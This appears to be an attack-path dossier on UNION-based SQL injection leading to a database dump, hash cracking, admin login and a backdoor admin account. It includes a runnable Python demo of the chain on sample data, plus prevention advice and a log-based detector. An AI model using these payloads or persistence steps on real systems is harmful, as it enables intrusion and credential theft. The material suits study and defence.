SQLi (UNION) → DB dump → admin login
Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.
§ Context
Assumed environment: the web app builds at least one SQL query by raw string concatenation of user input; the DB role the app connects with can read the users table (and information_schema, which it normally can for its own tables); there is no WAF, or its rules can be bypassed with encoding or comment tricks.
§ Steps
- 01 Map the app & find injectable params | Reconnaissance | W-RECON-DIRBRUTE: Directory & File Bruteforce
Every parameter that reaches a query (search, sort, filter, id) is a candidate; a single quote that changes the response or produces a DB error is the first signal.
- 02 Fingerprint the stack & DB | Reconnaissance | W-RECON-FINGERPRINT: Tech Stack Fingerprinting
Banner, error messages, DB-specific sleep functions.
- 03 Confirm UNION-based SQLi | Collection | W-SQLI-UNION: SQL Injection — UNION-Based
ORDER BY N to count columns, then UNION SELECT 1,2,… The last N that does not error is the column count; the UNION must supply exactly that many values, with NULL where a column's type is unknown, and the marker values show which columns are rendered in the response.
- 04 Enumerate schema (information_schema) | Collection | W-SQLI-UNION: SQL Injection — UNION-Based
information_schema.tables and information_schema.columns give table and column names on MySQL, PostgreSQL and MSSQL; SQLite exposes the same through sqlite_master.
- 05 Dump users table | Collection | W-SQLI-UNION: SQL Injection — UNION-Based
Include password hash + role columns.
- 06 Crack password hashes offline | Credential Access | T1110: Brute Force
Fast unsalted hashes (MD5, SHA-1) fall to a wordlist in minutes; bcrypt, scrypt or Argon2 make this the expensive step.
- 07 Authenticate as admin | Initial Access | T1078: Valid Accounts
Log in with the recovered credential; the dumped role column tells you which accounts are worth cracking first.
- 08 Plant a backdoor admin account | Persistence | W-ADMIN-PERSIST: Backdoor Admin Account
A second privileged account survives a password reset on the one you cracked.
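The confirm / enumerate / dump / crack / log-in sequence above, run end to end as an added example (this is not code from the dossier). It uses an in-memory SQLite database so it runs offline; sqlite_master stands in for information_schema.tables and .columns, the search function, table layout, rows and wordlist are all constructed, and the hashes are unsalted MD5 precisely because that is what makes the cracking step cheap. The parameterized variant at the end shows the same payload returning nothing.

```python
import hashlib
import sqlite3

# Constructed sample data (assumption, not from the page). Unsalted MD5 is deliberate:
# it is what makes step 06 cheap and what the defender should replace.
USERS = [("alice", "password", "user"), ("admin", "admin123", "admin")]

def md5(s):
    return hashlib.md5(s.encode()).hexdigest()

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT);
        INSERT INTO products VALUES (1, 'blue widget', 9.99), (2, 'red widget', 12.50);
    """)
    conn.executemany("INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
                     [(u, md5(p), r) for u, p, r in USERS])
    return conn

def search_vulnerable(conn, q):
    """The assumed bug from the Context section: input concatenated into the SQL string."""
    sql = "SELECT id, name, price FROM products WHERE name LIKE '%" + q + "%'"
    return conn.execute(sql).fetchall()

def search_safe(conn, q):
    """Same query with a bound parameter: the input can never change the statement."""
    return conn.execute("SELECT id, name, price FROM products WHERE name LIKE ?",
                        ("%" + q + "%",)).fetchall()

def count_columns(search, max_cols=20):
    """Step 03: ORDER BY N succeeds while N <= column count and errors once it exceeds it."""
    for n in range(1, max_cols + 1):
        try:
            search("' ORDER BY %d-- " % n)
        except sqlite3.OperationalError:   # MySQL reports 'Unknown column N in order clause'
            return n - 1
    return None

def union_payload(columns, source, where=""):
    """'AND 1=0' suppresses the legitimate rows so only the UNION rows come back.
    `columns` must match the count from count_columns; NULL pads safely because it
    is union-compatible with any type (this matters on PostgreSQL and MSSQL)."""
    return "' AND 1=0 UNION SELECT " + ",".join(columns) + " FROM " + source + where + "-- "

def enumerate_schema(search, ncols):
    """Step 04: table names and definitions. On MySQL/PostgreSQL read
    information_schema.columns; SQLite keeps the same data in sqlite_master."""
    cols = ["name", "sql"] + ["NULL"] * (ncols - 2)
    rows = search(union_payload(cols, "sqlite_master", " WHERE type='table'"))
    return {row[0]: row[1] for row in rows}

def dump_users(search, ncols):
    """Step 05: username, hash and role in one request."""
    cols = ["username", "password_hash", "role"] + ["NULL"] * (ncols - 3)
    return [tuple(row[:3]) for row in search(union_payload(cols, "users"))]

def crack_md5(target, wordlist):
    """Step 06: offline dictionary attack; trivial because the hash is fast and unsalted."""
    for word in wordlist:
        if md5(word) == target:
            return word
    return None

def login(conn, username, password):
    """Step 07: the app's own login check; returns the role on success."""
    row = conn.execute("SELECT role FROM users WHERE username=? AND password_hash=?",
                       (username, md5(password))).fetchone()
    return row[0] if row else None

def run_chain(conn, wordlist=("123456", "letmein", "admin123", "password")):
    search = lambda q: search_vulnerable(conn, q)
    ncols = count_columns(search)
    schema = enumerate_schema(search, ncols)
    users = dump_users(search, ncols)
    admin_hash = next(h for u, h, r in users if r == "admin")
    cleartext = crack_md5(admin_hash, wordlist)
    return {"columns": ncols, "tables": sorted(schema), "users": users,
            "admin_password": cleartext,
            "role": login(conn, "admin", cleartext) if cleartext else None}

if __name__ == "__main__":
    db = make_db()
    print(run_chain(db))
    # The parameterized search treats the same payload as a literal and returns nothing.
    print(search_safe(db, union_payload(["username", "password_hash", "role"], "users")))
```

The `AND 1=0` trick is not strictly required, but without it the legitimate rows are mixed into the output and, on a real page, usually occupy the rendered slots you want the injected rows to land in. Column counting by ORDER BY depends on the app surfacing a difference (error page, empty result, changed size) between N inside and outside the range; when it does not, fall back to UNION SELECT NULL,NULL,... with an increasing count.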
§ References
- T1078Valid Accounts
- T1110Brute Force
§ Frequently asked
- What is the "SQLi (UNION) → DB dump → admin login" attack path?
- Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin. It chains 8 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Map the app & find injectable params (W-RECON-DIRBRUTE), a reconnaissance primitive: unauthenticated access to the application is enough. Assumed environment: the web app builds at least one SQL query by raw string concatenation of user input, and the DB role can read the users table.
- What is the final impact of this kill-chain?
- The final step lands on Plant a backdoor admin account (W-ADMIN-PERSIST), which falls under Persistence: once authenticated as admin, the operator creates a second privileged account so access survives a password reset. From here, an operator typically pivots into post-exploitation.
- How can defenders detect or prevent this attack?
- Prevention concentrates on the root cause. Parameterized queries (or an ORM that emits them) remove the injection entirely; a least-privilege DB role that cannot read the users table or run arbitrary UNIONs against it limits what any residual injection reaches; slow, salted password hashing (bcrypt, scrypt, Argon2) and MFA on admin accounts break steps 06 and 07 even if the dump succeeds. For detection, look for UNION SELECT, ORDER BY N and information_schema strings in request parameters, a run of incrementing ORDER BY values or a burst of database errors from a single client, and admin logins from a new address shortly after such traffic. The MITRE ATT&CK entries under "References" list further mitigations, detection telemetry and known threat-actor usage for T1078 and T1110.
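The request-log side of that detection advice, as an added example that is not part of the dossier: a small analyzer over constructed combined-format access-log lines that flags UNION SELECT and schema-table strings, recognises the incrementing ORDER BY column-count probe of step 03, and counts server errors per client. The log lines, hosts and signatures are all assumptions; production rules would also need to cover POST bodies (absent from access logs), double URL-encoding and the other comment and case tricks used to evade simple patterns.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines in combined-log shape (assumed, not real traffic). The first
# host walks the UNION workflow from the Steps section; the second sends a benign query.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:12:00:01 +0000] "GET /search?q=widget HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2024:12:00:02 +0000] "GET /search?q=widget%27+ORDER+BY+1--+ HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2024:12:00:03 +0000] "GET /search?q=widget%27+ORDER+BY+2--+ HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2024:12:00:04 +0000] "GET /search?q=widget%27+ORDER+BY+3--+ HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2024:12:00:05 +0000] "GET /search?q=widget%27+ORDER+BY+4--+ HTTP/1.1" 500 512
203.0.113.7 - - [10/May/2024:12:00:06 +0000] "GET /search?q=x%27+UNION+SELECT+1,2,3--+ HTTP/1.1" 200 1610
203.0.113.7 - - [10/May/2024:12:00:07 +0000] "GET /search?q=x%27+UNION+SELECT+table_name,column_name,NULL+FROM+information_schema.columns--+ HTTP/1.1" 200 9123
198.51.100.4 - - [10/May/2024:12:00:08 +0000] "GET /search?q=order+by+mail HTTP/1.1" 200 1401
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Signatures are a starting point, not a complete ruleset. [\s/*]+ between keywords
# also catches the /**/ comment spacing used to dodge naive 'union select' matches.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s/*]+(?:all\b[\s/*]+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)\b", re.I),
    "schema_read": re.compile(r"\b(?:information_schema|sqlite_master|pg_catalog)\b", re.I),
}

def parse_line(line):
    """Split one combined-log line into ip, method, decoded path and status."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return {"ip": ip, "method": method, "path": unquote_plus(path), "status": int(status)}

def classify(path):
    """Return the names of every signature that matches the decoded request path."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(path))

def has_counting_run(numbers, min_len=3):
    """ORDER BY 1, 2, 3, ... from one client is the column-count probe of step 03."""
    run = 1
    for prev, cur in zip(numbers, numbers[1:]):
        run = run + 1 if cur == prev + 1 else 1
        if run >= min_len:
            return True
    return False

def analyze(log_text):
    """Per client: number of flagged requests, whether a column-count probe was seen,
    and how many 5xx responses it triggered (ORDER BY past the last column errors)."""
    hits = defaultdict(list)
    order_by_ns = defaultdict(list)
    errors = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        tags = classify(rec["path"])
        if tags:
            hits[rec["ip"]].append((rec["path"], tags, rec["status"]))
        m = SIGNATURES["order_by_probe"].search(rec["path"])
        if m:
            order_by_ns[rec["ip"]].append(int(m.group(1)))
        if rec["status"] >= 500:
            errors[rec["ip"]] += 1
    return {ip: {"flagged": len(h),
                 "column_probe": has_counting_run(order_by_ns[ip]),
                 "server_errors": errors[ip]} for ip, h in hits.items()}

if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The benign `order by mail` query is not flagged because the probe signature requires a numeric position; tuning that distinction is where most of the false-positive work on this kind of rule goes. The incrementing-ORDER-BY sequence is the stronger signal: it is rarely produced by legitimate users and it precedes the data theft, which is when a block still helps.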
§ Related dossiers
- Origin IP bypass → direct attack on backend (shared techniques: 2)
Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.
- Vesting beneficiary replace → silently drain stream (shared techniques: 2)
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.
- Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022) (shared techniques: 2)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
- ERC-4337 paymaster sponsor drain (shared techniques: 2)
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses; the paymaster pays the gas until its deposit hits zero.
- F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB (shared techniques: 2)
Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic: recover TLS keys, session cookies, internal SSO config.
- Citrix Bleed → steal authenticated session → MFA bypass (shared techniques: 2)
Send a long Host header to a vulnerable NetScaler; the memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.